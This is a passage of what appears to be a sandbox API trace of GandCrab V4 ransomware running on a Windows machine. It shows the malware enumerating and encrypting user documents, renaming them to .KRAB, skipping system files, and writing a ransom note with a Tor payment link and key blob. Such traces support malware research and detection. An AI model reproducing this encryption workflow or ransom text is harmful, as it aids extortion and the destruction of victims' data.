(lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xn1evc wlb0mw6.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xn1evc wlb0mw6.docx.krab")) returned 1 [0092.638] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.639] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.639] lstrcmpW (lpString1="ZwNP7.docx", lpString2=".") returned 1 [0092.639] lstrcmpW (lpString1="ZwNP7.docx", lpString2="..") returned 1 [0092.639] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="ZwNP7.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx" [0092.639] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.639] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx.KRAB") returned 47 [0092.639] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx") returned 42 [0092.639] lstrlenW (lpString=".docx") returned 5 [0092.640] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.640] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0092.640] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.640] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx") returned 42 [0092.640] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx") returned 42 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="desktop.ini") returned 1 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="autorun.inf") returned 1 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="ntuser.dat") returned 1 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="iconcache.db") returned 1 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="bootsect.bak") returned 1 [0092.640] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="boot.ini") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="ntuser.dat.log") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="thumbs.db") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="ntldr") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="NTDETECT.COM") returned 1 [0092.641] lstrcmpiW (lpString1="ZwNP7.docx", lpString2="Bootfont.bin") returned 1 [0092.641] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.641] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0092.642] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.642] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.642] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.642] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.642] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0092.643] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.643] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0092.643] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.644] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.644] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.644] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0092.644] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.644] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.645] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.645] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.645] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.645] GetLastError () returned 0x0 [0092.645] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.645] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.645] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0092.646] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0092.646] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.646] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.646] GetLastError () returned 0x0 [0092.646] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0092.646] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0092.647] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\zwnp7.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.652] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.652] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.653] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x1da9, lpOverlapped=0x0) returned 1 [0092.693] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffe257, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.693] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1da9, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x1da9, lpOverlapped=0x0) returned 1 [0092.694] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.694] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.713] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.714] CloseHandle (hObject=0x434) returned 1 [0092.714] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.714] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\zwnp7.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ZwNP7.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\zwnp7.docx.krab")) returned 1 [0092.716] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.716] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0092.717] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0092.717] CloseHandle (hObject=0x320) returned 1 [0092.717] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0092.717] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0092.717] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0092.717] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Downloads" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads" [0092.717] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\" [0092.717] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0092.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.718] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.718] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.719] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.719] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\\\KRAB-DECRYPT.txt") returned 49 [0092.719] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\downloads\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0092.721] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0092.721] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0092.721] CloseHandle (hObject=0x320) returned 1 [0092.722] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.722] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.723] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x27, wMilliseconds=0x397)) [0092.723] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.723] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.723] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.723] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 55 [0092.723] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\downloads\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0092.724] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.724] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.725] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\") returned 32 [0092.725] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*" [0092.725] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd3e0 [0092.725] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.725] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.725] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.725] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.725] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.725] lstrcmpW (lpString1="ChromeSetup.exe", lpString2=".") returned 1 [0092.729] lstrcmpW (lpString1="ChromeSetup.exe", lpString2="..") returned 1 [0092.729] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="ChromeSetup.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe" [0092.730] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.730] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe.KRAB") returned 52 [0092.730] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe") returned 47 [0092.730] lstrlenW (lpString=".exe") returned 4 [0092.730] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.731] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".exe ") returned 5 [0092.731] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.731] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.731] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.731] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0092.732] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0092.732] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock" [0092.732] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.732] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 60 [0092.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 55 [0092.732] lstrlenW (lpString=".lock") returned 5 [0092.732] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.733] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0092.733] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.733] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.733] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.733] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.733] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.733] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini" [0092.733] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.734] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini.KRAB") returned 48 [0092.734] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.734] lstrlenW (lpString=".ini") returned 4 [0092.734] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.734] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0092.734] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.735] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.735] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.735] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.735] lstrcmpW (lpString1="jre-8u131-windows-x64.exe", lpString2=".") returned 1 [0092.735] lstrcmpW (lpString1="jre-8u131-windows-x64.exe", lpString2="..") returned 1 [0092.735] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="jre-8u131-windows-x64.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe" [0092.735] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.736] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe.KRAB") returned 62 [0092.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe") returned 57 [0092.736] lstrlenW (lpString=".exe") returned 4 [0092.736] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.736] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".exe ") returned 5 [0092.736] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.737] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.737] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0092.737] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0092.737] lstrcatW (in: 